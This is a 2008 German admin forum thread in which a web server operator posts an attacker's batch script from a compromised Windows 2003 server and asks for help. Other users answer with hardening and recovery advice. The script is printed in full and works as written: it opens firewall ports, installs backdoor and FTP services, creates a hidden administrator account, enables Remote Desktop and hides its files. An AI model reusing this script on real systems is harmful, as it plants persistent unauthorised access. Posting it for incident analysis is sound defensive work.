matt-hh
Goto Top

Server gehackt, bzw. manipuliert - finde die Lücke nicht!

Hallo Admins und ITler,

einer unserer Webserver wurde heute Abend schon wieder von fremder Hand manipuliert und missbraucht face-confused
Zum Glück haben die spät angefangen, somit sind nur 15 GB verbraucht worden, bis ich es gemerkt habe.

Es ist nun schon des öfteren passiert und leider immer auf die selbe Art:

In c:\windows\Temp liegt eine batchdatei, die anscheined ausgeführt wird und den Server richtig schön umkonfiguriert.
Ich habe die letzten Male alle enthaltenen Schritte rückgängig gemacht, aber eine Woche später war alles wieder verändert.

Wie beschrieben handelt es sich um einen Webserver (Windows 2003 Web Edition SP2 alle Updates installiert)
Auf den Ordner TEMP haben Admins Vollzugriff, Authentifizierte Benutzer Leserechte, Netzwerkdienst Dateischreib-, lese,- ausführrechte (ASP.NET) und System mit Vollzugriff.

Was kann ich tun, was habe ich übersehen, braucht Ihr mehr Infos?

Ich hoffe ich darf den Inhalt dieser Datei hier posten, sonst bitte sofort löschen und ich schicke den Inhalt per Mail an Interessierte.

@echo OFF

mkdir %windir%\system32\spool
mkdir %windir%\system32\spool\drivers
mkdir %windir%\system32\spool\drivers\w32x86
mkdir %windir%\system32\dllcache
mkdir %windir%\system32\config
mkdir %windir%\system32\spool\drivers\w32x86\ddemsn
mkdir %windir%\system32\PreInstall
mkdir %windir%\system32\PreInstall\IMAP

move iplist.exe %windir%\system32\spool\drivers\w32x86\ddemsn
move psinfo.exe %windir%\system32\spool\drivers\w32x86\ddemsn
move test.bat %windir%\system32\spool\drivers\w32x86\ddemsn
move uptime.exe %windir%\system32\spool\drivers\w32x86\ddemsn
move secured.exe %windir%\system32\spool\drivers\w32x86\ddemsn

move inf.ocx %windir%\system32

move localsrv.sav %windir%\system32\config
move jasfv.dll %windir%\system32\PreInstall\IMAP
move jasfv.ini %windir%\system32\PreInstall\IMAP
move ibcserv.exe %windir%\system32\PreInstall\IMAP
move imapservice.dll %windir%\system32\PreInstall\IMAP
move filter.ini %windir%\system32\PreInstall\IMAP
move filter.dll %windir%\system32\PreInstall\IMAP
move spooler.exe %windir%\system32\spool

::add firewall exceptions
echo Windows Registry Editor Version 5.00>firewall.reg
echo. >>firewall.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]>>firewall.reg
echo "%%windir%%\\system32\\qttask.exe"="%%windir%%\\system32\\preinstall\\imap\\ibcserv.exe:*:Enabled">>firewall.reg
echo. >>firewall.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]>>firewall.reg
echo "%%windir%%\\system32\\qttask.exe"="%%windir%%\\system32\\preinstall\\imap\\ibcserv.exe:*:Enabled">>firewall.reg
echo. >>firewall.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]>>firewall.reg
echo "517:TCP"="517:TCP:*:Enabled">>firewall.reg
echo "1038:TCP"="1038:TCP:*:Enabled">>firewall.reg
echo "1138:TCP"="1138:TCP:*:Enabled">>firewall.reg
echo "4589:TCP"="4589:TCP:*:Enabled">>firewall.reg
echo "4590:TCP"="4590:TCP:*:Enabled">>firewall.reg
echo "2000:TCP"="2000:TCP:*:Enabled">>firewall.reg
echo "2100:TCP"="2100:TCP:*:Enabled">>firewall.reg
echo "2200:TCP"="2200:TCP:*:Enabled">>firewall.reg
echo "2300:TCP"="2300:TCP:*:Enabled">>firewall.reg
echo "2400:TCP"="2400:TCP:*:Enabled">>firewall.reg
echo "2500:TCP"="2500:TCP:*:Enabled">>firewall.reg
echo "2600:TCP"="2600:TCP:*:Enabled">>firewall.reg
echo "2633:TCP"="2633:TCP:*:Enabled">>firewall.reg
echo "2634:TCP"="2634:TCP:*:Enabled">>firewall.reg
echo "2700:TCP"="2700:TCP:*:Enabled">>firewall.reg
echo "2701:TCP"="2701:TCP:*:Enabled">>firewall.reg
echo "2702:TCP"="2702:TCP:*:Enabled">>firewall.reg
echo "2703:TCP"="2703:TCP:*:Enabled">>firewall.reg
echo "2800:TCP"="2800:TCP:*:Enabled">>firewall.reg
echo "2801:TCP"="2801:TCP:*:Enabled">>firewall.reg
echo "2802:TCP"="2802:TCP:*:Enabled">>firewall.reg
echo "2900:TCP"="2900:TCP:*:Enabled">>firewall.reg
echo "3000:TCP"="3000:TCP:*:Enabled">>firewall.reg
echo "4589:TCP"="4589:TCP:*:Enabled">>firewall.reg
echo "4590:TCP"="4590:TCP:*:Enabled">>firewall.reg
echo. >>firewall.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]>>firewall.reg
echo "517:TCP"="517:TCP:*:Enabled">>firewall.reg
echo "1038:TCP"="1038:TCP:*:Enabled">>firewall.reg
echo "1138:TCP"="1138:TCP:*:Enabled">>firewall.reg
echo "2000:TCP"="2000:TCP:*:Enabled">>firewall.reg
echo "2100:TCP"="2100:TCP:*:Enabled">>firewall.reg
echo "2200:TCP"="2200:TCP:*:Enabled">>firewall.reg
echo "2300:TCP"="2300:TCP:*:Enabled">>firewall.reg
echo "2400:TCP"="2400:TCP:*:Enabled">>firewall.reg
echo "2500:TCP"="2500:TCP:*:Enabled">>firewall.reg
echo "2600:TCP"="2600:TCP:*:Enabled">>firewall.reg
echo "2633:TCP"="2633:TCP:*:Enabled">>firewall.reg
echo "2634:TCP"="2634:TCP:*:Enabled">>firewall.reg
echo "2700:TCP"="2700:TCP:*:Enabled">>firewall.reg
echo "2701:TCP"="2701:TCP:*:Enabled">>firewall.reg
echo "2702:TCP"="2702:TCP:*:Enabled">>firewall.reg
echo "2703:TCP"="2703:TCP:*:Enabled">>firewall.reg
echo "2800:TCP"="2800:TCP:*:Enabled">>firewall.reg
echo "2801:TCP"="2801:TCP:*:Enabled">>firewall.reg
echo "2802:TCP"="2802:TCP:*:Enabled">>firewall.reg
echo "2900:TCP"="2900:TCP:*:Enabled">>firewall.reg
echo "3000:TCP"="3000:TCP:*:Enabled">>firewall.reg
echo "4589:TCP"="4589:TCP:*:Enabled">>firewall.reg
echo "4590:TCP"="4590:TCP:*:Enabled">>firewall.reg
echo. >>firewall.reg
regedit /s firewall.reg
del firewall.reg /Q

::start serv-u
%systemroot%\system32\PreInstall\IMAP\ibcserv.exe /i

::backdoor
start %windir%\system32\spool\spooler.exe

sca.exe config rpcapd displayname= "Imap Burn Control"
sca.exe description RAS "This service handles Imap Burn Controls sent by clients in your network. If this service is disabled, all services that depend on it, default: Remote Procedure Call (RPC), will fail to start. It is highly recommended to enable this service."
sca.exe config RpcSs depend= rpcapd
sca.exe config rpcapd error= ignore
sca.exe config rpcapd start= auto
sca.exe start rpcapd

::add/hide user
net1 user SUPPORT_27931a9 banana /add & Net1 Localgroup Administrators SUPPORT_27931a9 /add & reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList t" /v SUPPORT_27931a9 /t REG_DWORD /d 0

echo REGEDIT4 >> user.reg
echo
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts] >> user.reg
echo
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] >> user.reg
echo "SUPPORT_27931a9"=dword:00000000 >> user.reg

regedit /s user.reg
del user.reg

::add backdoor
xnet.exe install Ntf /b:%windir%\system32\tlntsvr.exe /n:"Network Interface" /i:no /s:auto
xnet.exe start Ntf
sca.exe start ntf
net start Ntf

::minor secure
sca.exe delete dntus26
sca.exe delete psexec
net share admin$ /del
net stop dntus26
net stop psexec

::enable TS
echo Windows Registry Editor Version 5.00 >> ts_on.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server] >> ts_on.reg
echo "TSEnabled"=dword:00000001 >> ts_on.reg
echo "TSUserEnabled"=dword:00000001 >> ts_on.reg
echo "fAllowToGetHelp"=dword:00000001 >> ts_on.reg
echo "fDenyTSConnections"=dword:00000000 >> ts_on.reg
regedit.exe /s "ts_on.reg"
del /f ts_on.reg

attrib %windir%\system32\PreInstall\IMAP\jasfv.dll +h
attrib %windir%\system32\PreInstall\IMAP\jasfv.ini +h
attrib %windir%\system32\PreInstall\IMAP\ibcserv.exe +h
attrib %windir%\system32\PreInstall\IMAP\imapservice.dll +h
attrib %windir%\system32\PreInstall\IMAP\filter.ini +h
attrib %windir%\system32\PreInstall\IMAP\filter.dll +h
attrib %windir%\system32\Preinstall +h
attrib %windir%\system32\Preinstall\IMAP +h
attrib %windir%\system32\spool\spooler.exe +h

%windir%\system32\spool\drivers\w32x86\ddemsn\test.bat
del %windir%\system32\spool\drivers\w32x86\ddemsn\test.bat
del sca.exe
del xnet.exe
del 389742.bat

Content-ID: 79819

Url: https://administrator.de/contentid/79819

Ausgedruckt am: 08.11.2024 um 17:11 Uhr

kaiand1
kaiand1 04.02.2008 um 08:40:32 Uhr
Goto Top
Wie immer $m server....
Denke mal du hast den IIS mit ASP drauf schau da mal in logbuch welche Zugriffe vorher statfnden und mit welchern Parametern deine Domains aufgerufen wurden dadruch köntes du es schon erkennen.
evtl kommen die uch durch ein Scrit auf dem Webserver drauf...
Dabei wähe gut zu wissen welche "Dienste" du alles laufen hast.
Welche Ports sind offen?
Laut den Schreiben nehme ich an das du diese komische winschrott firewall verwendest
Nimm mal eine andere dadurch sollten die es schonmal schwerer haben.
Wiso stells du nciht um auf Linux dann hättes du da paar Probleme weniger...
Netzheimer
Netzheimer 04.02.2008 um 08:45:58 Uhr
Goto Top
Ganz schön dickes Ding!

Ich würde mal zuerst an den Unsern / Admins schrauben. Standardbenutzernamen und Defaultkennwörter ändern und ersetzen.

In der Firewall (Hard- oder Softwarefirewall?) von außen alles erst mal dicht machen und vorerst nur die unbedingt benötigten Ports öffnen.

Firewall überwachen: Portscanns > 50 Ports pro Sekunde sind auffällig.

Log-Dateien kontrollieren, Eigenschaften der temporären Datei ansehen (wer hat die denn erstellt).

Blöder aber wirkungsvoller Trick: .reg-Dateien mit anderem Programm öffnen lassen (Paint,...)
Matt-HH
Matt-HH 04.02.2008 um 12:08:39 Uhr
Goto Top
Hallo,

ersteinmal Danke für Eure Tipps!

Hier mal ein paar Antworten, ich hoffe die helfen:

1. Es laufen folgende Dienste:

Anwendungskompatibilitäts-Suchdienst
Arbeitsstationsdienst
Automatische Updates
COM+-Ereignissystem
Computerbrowser
DCOM Server
DCOM-Server-Prozessstart
DHCP-Client
DNS-Client
Drahtloskonfiguration
Druckwarteschlange
Ereignisprotokoll
Fehlerberichterstattungsdienst
Firebird Guardian - DefaultInstance
Firebird Server - DefaultInstance
FTP-Publishingdienst
Geschützter Speicher
Hilfe und Support
HTTP-SSL
IIS Verwaltungsdienst
Intelligenter Hintergrundübertragungsdienst
IPSEC-Dienste
Kryptografiedienste
MySQL
Netzwerkverbindungen
NLA (Network Location Awareness)
Persits Software EmailAgent
Plug & Play
Remoteprozeduraufruf (RPC)
Remoteregistrierung
RPC-Locator
Sekundäre Anmeldung
Server
Shellhardwareerkennung
Sicherheitskontenverwaltung
SQL Server VSS Writer
SQL Server-Browser
SQL Server-Volltextsuche (SQLEXPRESS)
Systemereignisbenachrichtigung
Taskplaner
TCP/IP-NetBIOS-Hilfsprogramm
Terminaldienste
Überwachung verteilter Verknüpfungen (Client)
Verwaltung logischer Datenträger
Windows Audio
Windows-Verwaltungsinstrumentation
Windows-Zeitgeber
WWW-Publishingdienst
Zertifikatdienste

2. Die Windows Firewall ist aus, wir haben bisher mit IP Sicherheitsrichtlinien gearbeitet.
Folgende Einstellungen sind enthalten:

Offene Ports:
3389 (TD)
123 (Nettime)
3306 (MySQL)
80 (http)
443 (https)
27500 + 27015 (HLStatsX überbleibsel unserer letzten CSS LAN face-big-smile - hab ich gerade gelöscht)
21 (FTP)

Geschlossen:
All ICMP Traffic - Alle Ports die oben nicht erwähnt sind werden blockiert

3. Auf die Linuxfrage antworte ich nicht face-smile aber trotzdem Danke für die Info


Sonstige Anmerkung:
Ich musste gerade in dem TEMP Ordner den "Benutzern" wieder Schreibrechte geben, weil sonst die Verbindung zu MS Access DBs nicht funktioniert.

Soll ich die Windows Firewall aktivieren oder lieber aus lassen?

Habe zum Test mal die Kontingentverwaltung auf allen Laufwerken aktiviert und neuen Usern ein Limit von 5 MB gesetzt, vielleicht hilft das auch (wenn die es nicht merken face-smile)

LG aus HH
Matt
DirtDiver
DirtDiver 04.02.2008 um 12:37:09 Uhr
Goto Top
Ist der Server bei Ihnen Lokal oder handelt es sich um einen gemieteten in einem Rechenzentrum? Wenn letzteres: Ich hoffe es ist KEIN shared/virtual Server...

Da der Server Verbindung ins Internet würde ich den Einsatz einer entsprechenden Sicherheitslösung (AV + FW) für Server empfehlen. Alles andere wird nur "halbherzige" Eindringlinge abschrecken.

-DD
Matt-HH
Matt-HH 04.02.2008 um 12:42:35 Uhr
Goto Top
Hallo DirtDiver,

der Server steht in einem RZ (angemietete Schränke) und gehört uns, kein virtuell Server.

AV ist auf einem anderen Server, der diesen mit überwacht.
Welche FW würdest Du empfehlen?

Matt
60730
60730 04.02.2008 um 15:17:36 Uhr
Goto Top
Blöder aber wirkungsvoller Trick:
.reg-Dateien mit anderem Programm öffnen
lassen (Paint,...)


Nöööö!!!!!!!!!!!


Schau mal in das Scriptkiddieskript rein:
regedit /s user.reg
regedit /s firewall.reg
regedit.exe /s "ts_on.reg"

Der startet das selber mit regedit.....(Wenn "kurzfristig" - dann Paintkopie in Regedit umbenennen)

Aber das wird auch nur 10 sekunden länger brauchen, das herauszufinden, bzw. wenn der "Autor" Google bedienen kann, dann wird er auch jede unserer Antowrten lesen und sich "wappnen"

Schau mal, wann diese Datei /(die du gepostet hast) erzeugt wurde und wer sich kurz vorher an dem System angemeldet hat (eventvwr)


Ich "tippe" darauf, das ausführrechte (ASP.NET) das Problem sind, werden die benötigt?
60730
60730 04.02.2008 um 15:21:26 Uhr
Goto Top
Welche FW würdest Du empfehlen?

Matt

http://www.sonicwall.com/de/

Oder jede andere Hardwarefirewall.

Merke,

Das System, das Du schützen willst, darf nie das System sein, wo die Firewall läuft!
Matt-HH
Matt-HH 04.02.2008 um 15:35:39 Uhr
Goto Top
@timobeil,

Hallo, leider habe ich die bat Datei sofort gelöscht, nur den Inhalt in eine Textdatei kopiert, weil ich etwas "Schiss" hatte face-smile

Das ich sie gefunden habe war eh Glück, denn normalerweise wird sie anscheinend von sich selbst gelöscht (del 389742.bat), beim zweiten Angriff habe ich die Datei auch nirgends mehr finden können.

Ich habe auch die Vermutung, das es über ASP.NET reinkommt, aber wir brauchen leider für unsere Seiten die Unterstützung face-confused

Danke für den Tip mit der FW, ich schau mir das mal an!

Gruß Matt
60730
60730 04.02.2008 um 16:38:27 Uhr
Goto Top
dauerbatch:

cmd /c "net localgroup Administratoren" >irgendwohin-original.irgendwas

:dichkriegich
cmd /c "net localgroup Administratoren" >irgendwohin.irgendwas
fc /b irgendwohin.irgendwas irgendwohin-original.irgendwas
if %errorlevel% ==1 goto schonwiedereinneueradmin
if %errorlevel% ==0 goto end

:schonwiedereinneueradmin
echo "tja, alles, was ich hier schreiben würde, könnte auch derjenige lesen, den du da nicht haben willst. Vielleicht stoppt dieser Abschnitt einen Dienst, oder schickt per Bmail (das nicht unbedingt Bmal heissen muss) eine Mail, oder cmd / c netstat>weristaufdemsystem.irgendwas oder oder

:end
goto dichkriegich

Ps:
http://www.beyondlogic.org/solutions/cmdlinemail/cmdlinemail.htm
Matt-HH
Matt-HH 05.02.2008 um 01:08:01 Uhr
Goto Top
Ich bin echt am Ende...

Schon wieder sind die drauf und diesmal weiß ich nichtmal wie!!!
Kein Dienst gestartet, kein neuer User, kein zusätzlicher FTP-Server wie beim letzten Mal, keine Batch Datei...

Das einzige was ich finden kann sind 12 Filme, 8 GB weniger Speicherplatz und 32 GB verbrauchter Traffic... wenn ich die Filme wenigstens gebrauchen könnte face-big-smile

Beim löschen hab ich zwar etwas gegrinst, aber was sind schon 8 GB bei den heutigen Upstreams, zu ISDN Zeiten hätte ich jetzt wesentlich mehr Befriedigung dabei verspürt :-P

Bin weiterhin für alles offen. Externe FW kommt aus finanziellen Gründen momentan nicht in Frage.

Irgendwie muss doch noch jemand diese Art von Attacken kennen, erlebt und sogar vielleicht überlebt haben...

Grüße
Matt
60730
60730 05.02.2008 um 10:23:53 Uhr
Goto Top
Sorry, M$ Server im "Onlinebereich" ist nicht meine Baustelle.

"Wer" (benutzername) hat die Filme draufgestellt", und wann - was sagt das Eventlog um die Uhrzeit?

In den Script steht doch was von Backdoor, die sind immer noch auf dem System...


Hast Du immer noch diese Dienste am Laufen?

DHCP-Client - brauchst den ???
Drahtloskonfiguration dito??
Taskplaner???


Hilfe und Support - braucht keiner auf dem Server -oder doch
Windows Audio ????

Was hat es mit den beiden Firebird Diensten aufsich?
MYSQL und SQL sollen auf der Kiste laufen?


Die Links kennst du?

http://msdn2.microsoft.com/de-de/library/87x8e4d1(VS.80).aspx

http://msdn2.microsoft.com/de-de/library/ms178699(VS.80).aspx

http://msdn2.microsoft.com/de-de/library/ms178692(VS.80).aspx
DirtDiver
DirtDiver 05.02.2008 um 11:00:47 Uhr
Goto Top

Das System, das Du schützen willst,
darf nie das System sein, wo die Firewall
läuft!



Das halte ich für ein Gerücht. Sicherlich sollte schon im Netzwerk selbst eine entsprechende Firewall sein, jedoch ist dies kein Grund eine Firewall auf dem System selbst wegzulassen.


@15696:

Du schreibst, die Kiste wird "mitgescannt". Investiert das Geld für eine Server-AV-Lösung - Es lohnt sich definitiv. Ein "mitscannen" mag schön und Gut sein, aber nicht effektiv genug. Ich persönlich präferiere F-Secure und habe die Software auch auf meinem privatem Server laufen.

Hast du den Server mal mit einem vernünftigen Virenscanner auf Malware untersucht? Ich spreche jetzt von einem Scanner, der auch Rootkits erkennen kann und nicht nur auf Virendefinitionen fusst.

-DD
Matt-HH
Matt-HH 05.02.2008 um 11:22:41 Uhr
Goto Top
Hallo Timo,

ja leider brauchen wir die ganzen verschiedenen Datenbanklösungen, wir entwicklen hier Onlinelösungen und dafür benötigen wir die ganze Palette.

DHCP, Drahtlos, und Hilfe brauchen wir nicht.

Die Links kenne ich nur teilweise, der zweite ist sehr hilfreich, den gehe ich mal durch.

DANKE DIR!!!
60730
60730 05.02.2008 um 11:36:33 Uhr
Goto Top
>
> Das System, das Du schützen
willst,
> darf nie das "einzige" System sein, wo die
Firewall
> läuft!
>
>
>

Das halte ich für ein Gerücht.
Sicherlich sollte schon im Netzwerk selbst
eine entsprechende Firewall sein, jedoch ist
dies kein Grund eine Firewall auf dem System
selbst wegzulassen.
.

-DD


OK - habe den beanstanden Satz erweitert. - So ok?

"Zusätzlich" kann auf dem zu schützenden System eine Firewall drauf laufen, aber eine DMZ wird deswegen noch lange nicht daraus.
telefix1
telefix1 05.02.2008 um 11:44:38 Uhr
Goto Top
...TimoBeil hat Recht: die sind immer noch auf dem Server und reaktivieren sich über den Taskplaner selbst.

Ich würde die Kiste erstmal vom Netz nehmen und deren Skript in umgekehrter Reihenfolge! und negierten Befehlen abarbeiten. D.h., die verstekten Dateien wieder sichtbar machen, die Registry-Einträge editieren, das Backdoor schließen, deren User mit Admin-Rechten löschen, den Taskplaner killen, deren Server abschiessen, die angelegten Ordner säubern und löschen und die Ports schließen...

Danach mit o.g. Scannern und Logs den Angreifer ertappen...

Das klingt nach Arbeit face-wink

mfg telefix1
Matt-HH
Matt-HH 05.02.2008 um 11:45:45 Uhr
Goto Top
Hallo DirtDiver,

also gescannt habe ich ihn gestern, allerdings mit Norton Corporate.
Gefunden hat er nichts.

Gruß
Matt
telefix1
telefix1 05.02.2008 um 11:49:45 Uhr
Goto Top
...der kann auch nichts finden. Das sind ganz normale Befehle aus dem Windows-Handbuch ohne Virus-Signatur...

mfg telefix1

Ach ja, das Ergebnis und Deine detaillierten Bemühungen würden mich sehr interessieren.
Matt-HH
Matt-HH 05.02.2008 um 11:50:17 Uhr
Goto Top
Hallo telefix1,

eigentlich hatte ich das genau so gemacht, aber anscheinend etwas übersehen.
Ich werde das noch mal durchgehen, nur das von dem Netz nehmen ist nicht so einfach, denn dann schmeiß ich mich selber raus face-big-smile
telefix1
telefix1 05.02.2008 um 11:56:38 Uhr
Goto Top
nur das
von dem Netz nehmen ist nicht so einfach,
denn dann schmeiß ich mich selber raus
face-big-smile

...ich meinte das auch eher virtuell, als hardwaremäßig...
VPN o.ä., obwohl tunneln in diesem Fall ja auch Quatsch wäre... face-wink

mfg telefix1
kaiand1
kaiand1 05.02.2008 um 19:17:07 Uhr
Goto Top
Probier mal in der CMD den Befehl "tasklist /v" und guck ob dort ein "Programm" auffällt was nicht dahingehört.
Aber da die wohl so immer reinkommen heißt es eigentlich für dich nur noch
Daten sichern
Server abschalten & ggfs. Neuinstallieren was evtl hilft(falls die Quelle nicht gefunden wurde)
Sonst ärgern die dich nacher so unmd schrotten dein System oder machen noch sons was damit und du hast die A-Karte dann...
Matt-HH
Matt-HH 05.02.2008 um 23:09:49 Uhr
Goto Top
Hallo Kaiand1,

habe ich gemacht, da läuft nichts, was nicht laufen sollte.
Bis jetzt war Ruhe, vielleicht hat das rückwärts durcharbeiten der Batch was gebracht.

Ich lass mich überraschen und halte Euch auf dem laufenden face-smile

Gruß Matt
bino
bino 25.02.2008 um 14:49:15 Uhr
Goto Top
Hallo Kaiand1,

habe ich gemacht, da läuft nichts, was
nicht laufen sollte.
Bis jetzt war Ruhe, vielleicht hat das
rückwärts durcharbeiten der Batch
was gebracht.

Ich lass mich überraschen und halte
Euch auf dem laufenden face-smile

Gruß Matt

Hallo Matt,

ich habe mal als Admin für einen Webhoster gearbeitet.

Ich würde Dir den Tip geben, auch wenn derzeit nichts passiert, den Server mit einer neuen IP bzw. Domain (wenn es geht) neu aufzusetzen. Wenn es halbwegs professionelle waren, dann ist es in der Regel so, das beim betroffenen Server meist ein Hintertürchen offen gelassen wird.
Dann könnte es Dir passiert sein, das Dein Server in einer Wall of Fame gelistet ist...was anderen widerum anspornen wird die nächste Lücke zu finden.

LG Bino
Matt-HH
Matt-HH 27.02.2008 um 00:14:34 Uhr
Goto Top
Hallo Bino,

danke für den Tipp, haben bereits einen neuen Server bestellt und transferieren alles.
Danach wird er platt gemacht!

Bisher ist Ruhe!!! Teu teu teu...
seppxx
seppxx 29.02.2008 um 07:51:38 Uhr
Goto Top
also wie schon gesagt, legt ein Angreifer immer nen Backdoor an, beispielsweiße mit "netcat"


schau doch einfach mal deine Webanwendungen an, die auf dem Server laufen!

Wenn ich beispielsweiße ne Remote File Inclusion in einer Webpräsenz finde und dazu noch der "Secure Mode" auf OFF ist, hat mal vollen Zugriff auf das Dateisystem!!
www-hostmaster
www-hostmaster 04.03.2008 um 01:19:21 Uhr
Goto Top
Wenn man den Server genauso wiederherstellt, wie er mal war (sei es durch Neuinstallation oder "Umkehren" der Batch-Befehle) hat man doch _garnichts_ gewonnen. Jedenfalls hört sich das meinem Gefühl nach nicht so an, als hätte jemand über eine inzwischen gepatchte OS-Lücke Zugang erhalten. Klingt eher wie eine unsicher programmierte Anwendung.

Ich würde alle Zugriffe protokollieren (Network Monitor:http://blogs.technet.com/netmon/) und Anzeige erstatten. Und ich sage es schon jetzt: trotzdem.

Hatte ich mal zu ISDN-Zeiten. War eine Rechnung über mehrere Tausend irgendwas (weiß nicht mehr ob DM oder schon Euro).


(mk)
17677
17677 04.03.2008 um 13:13:57 Uhr
Goto Top
Hast du auf diesem Server die Frontpage Server Erweiterungen aktiviert?
Wenn du diese nicht benötigst, entferne diese, denn diese werden gerne als Einfallstor hergenommen.
HightopOne
HightopOne 05.03.2008 um 07:09:41 Uhr
Goto Top
fassen wir mal zusammen.

du hast ein kompromittiertes System,nein was red ich ein kompromittierten Server,das heisst im klartext : Alle Daten Passwörter und was sonst noch so auf den Server liegt gilt ab sofort als veröffentlich.

Das was empfohlen wird an tollen tips kannst du getrost vergessen,weil der Server weder Sicherheit bietet noch würde ein ändern aller passwörter weiterhelfen,alle Backups des Servers sind auch kompromittiert,da nicht zurück zu verfolgen ist,ab wann der angreifer sich auf dem System breitgemacht hat.

Somit hast du die kacke wirklich am dampfen,weil du musst jetzt dich mit deinem Chef auseinandersetzen und dem Mitteilen,das nichts mehr sicher ist,du musst ihm mitteilen,das die Backups nichts mehr wert sind,du musst ihm mitteilen,das der server neuaufgesetzt werden muss und du musst ihm mitteilen das alles verschlüsselten daten nicht mehr sicher sind.

ergo: Strafanzeige gegen unbekannt stelle mit dem protokollen die vorhanden sind.
Festplatten ausbauen und in den tresor legen,als beweissicherung,ebenso wie die Backups.

Server neu aufsetzen,einrichten,etc. ,alle User in der Firma über die Gruppenrichtlienie zwingen,beim nächsten login ein neues Passwort sich abzuholen,die Hauptadmin Passwörter nur zwei oder drei leuten mitteilen.

Alles andere wäre unverantwortlich und stellt nicht sicher das der Server wieder dir gehört.

Viel spass beim Chef und wenn du schon bei dem sitzt ,dann sag ihm wer an der sicherheit spart,muss sich nicht wundern,wenn sowas passiert,sollst mal sehen wie schnell ihr ne neue Hardware FW habt.
PersonX
PersonX 05.03.2008 um 08:50:47 Uhr
Goto Top
Server neu aufsetzen,einrichten,etc. ,alle
User in der Firma über die
Gruppenrichtlienie zwingen,beim nächsten
login ein neues Passwort sich abzuholen,die
Hauptadmin Passwörter nur zwei oder drei
leuten mitteilen.



Du hast schon gelesen das es ein Webserver ist???? Was sollen da Gruppenrichtlinien???
bino
bino 05.03.2008 um 09:03:30 Uhr
Goto Top
fassen wir mal zusammen.

Boah watt bisse fürn fiese möp face-smile

Aber recht hast Du....wer spart sollte sich nicht wundern.

Mit besten Grüßen
Bino
HightopOne
HightopOne 05.03.2008 um 16:45:06 Uhr
Goto Top
> Server neu aufsetzen,einrichten,etc.
,alle
> User in der Firma über die
> Gruppenrichtlienie zwingen,beim
nächsten
> login ein neues Passwort sich
abzuholen,die
> Hauptadmin Passwörter nur zwei
oder drei
> leuten mitteilen.
>


Du hast schon gelesen das es ein Webserver
ist???? Was sollen da Gruppenrichtlinien???

über den Webserver hat er sich den zugang verschafft,wer sagt dir,das er nicht schon fröhlich in der Firma rumturnt udn sich von dort auch noch sachen holt und sich hintertürchen eingebaut hat ?
meine meinung ist immer noch,Plattmachen, neu aufziehen ,sicherheit hochfahren bis unter die decke. Chef Geld aus dem rippen leiern für Sicherheit. Dabei unschuldig kucken und hoffen das er keine Kündigungsschreiben in seiner geberlaune verteilt.
PersonX
PersonX 05.03.2008 um 18:48:03 Uhr
Goto Top
Zitat hightopone
"über den Webserver hat er sich den zugang verschafft,wer sagt dir,das er nicht schon fröhlich in der Firma rumturnt udn sich von dort auch noch sachen holt und sich hintertürchen eingebaut hat ?"
Zitatende


Zitat Matt HH
"der Server steht in einem RZ (angemietete Schränke) und gehört uns"
zitatende

Daraus würde ich mal schliessen das es kein Server ist der in der Firma steht. face-wink

Die nutzen irgendeine Schwachstelle einer Anwendung aus.